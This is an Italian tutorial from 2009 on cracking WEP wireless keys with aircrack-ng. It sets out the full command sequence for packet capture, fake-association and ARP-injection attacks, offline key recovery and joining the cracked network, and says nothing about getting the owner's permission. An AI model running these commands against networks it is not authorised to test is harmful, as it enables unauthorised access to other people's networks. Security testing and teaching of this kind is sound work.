Autore: Fabio Di Matteo
Ultima revisione: 29/06/2009
Di solito in casa o anche in piccoli uffici si utilizzano access point wireless basati sulla cifratura Wep(Wired Equivalent Privacy), dal costo contenuto e facili da configurare. La cifratura si basa
su una chiave spesso a 64, 128 o 256 bit ovvero una sorta di “password” che condivisa tra access point e client permette di creare delle reti ed eventualmente di far navigare i client anche su internet tramite un gateway.
Nel seguito di questo articolo vedremo come ottenere questa chiave analizzando il traffico tra access point e client mediante gli strumenti forniti dalla suite aircrack-ng .
Ecco tutto quello che serve:
In alternativa si puo' optare su Backtrack una distribuzione live e installabile incentrata sulla sicurezza .
Uno o piu' client che sono collegati alla rete mediante un access point wireless. E' importante ,per la riuscita del crack, che vi sia almeno un client funzionante associato al nostro access point.
E' utile settare in maniera fissa il bitrate della scheda di rete wifi con questo comando in modo da evitare bitrate variabili:
iwconfig <dispositivo di rete> rate 1M
La prima cosa da fare e' senz'altro quella di dare uno sguardo alle nostre reti wireless in zona che vogliamo testare e segnarci le seguenti informazioni:
per lo scopo puo' essere utile lanciare il comando :
airodump-ng <dispositivo di rete>
Diamo il via all'acquisizione dei pacchetti su file mediante il comando:
airodump-ng -c <numero canale> --band bg <dispositivo di rete> -w <prefisso files dove riporre cattura>
Verranno generati alcuni file con un prefisso scelto da noi (es. “cattura”) che serviranno ai programmi per tentare
di craccare le reti. Per velocizzare l'operazione e' stato utile specificare anche il canale con la
opzione -c <numero canale> .
Questa procedura non deve essere interrotta fino a quando non si ottiene la chiave.
Durante l' acquisizione dei pacchetti e' importate effettuare gli attacchi “fake association” e “injection” per diminuire
il tempo necessario a ottenere gli IVS . E' da considerare che per craccare una rete WEP posssono essere necessari circa 50.000 ivs (a partire dalla versione 1.0 di aircrack-ng).
verifichiamo che la nostra scheda di rete wifi supporti l'injection:
aireplay-ng --test <dispositivo di rete>
Prima fase:
aireplay-ng -1 0 -e <essid> -a <bssid> -h <nostro mac address> <dispositivo di rete>
Seconda fase:
aireplay-ng -3 -b <bssid> -h <nostro mac address> <dispositivo di rete>
Queste procedure non devono essere interrotte fino a quando non si ottiene la chiave.
In seguito si sottopongo i file ottenuti con airodump ad aircrack-ng in questo modo:
aircrack-ng *.cap
Aircrack-ng al temine delle operazioni fornira' la chiave in formato esadecimale per l'accesspoint selezionato.
Puo' essere utile a questo punto un riavvio del nostro sistema operativo Ottenuta la chiave non ci resta che collegarci alla rete:
iwconfig <dispositivo di rete> essid [il nostro essid] iwconfig <dispositivo di rete> key [la nostra chiave wep] iwconfig <dispositivo di rete> channel [il numero del canale radio]
ed impostare gli indirizzi seguendo per esempio questo articolo configurare scheda di rete con ifconfig, oppure se e' presente in rete un server DHCP e' sara' sufficiente un
dhclient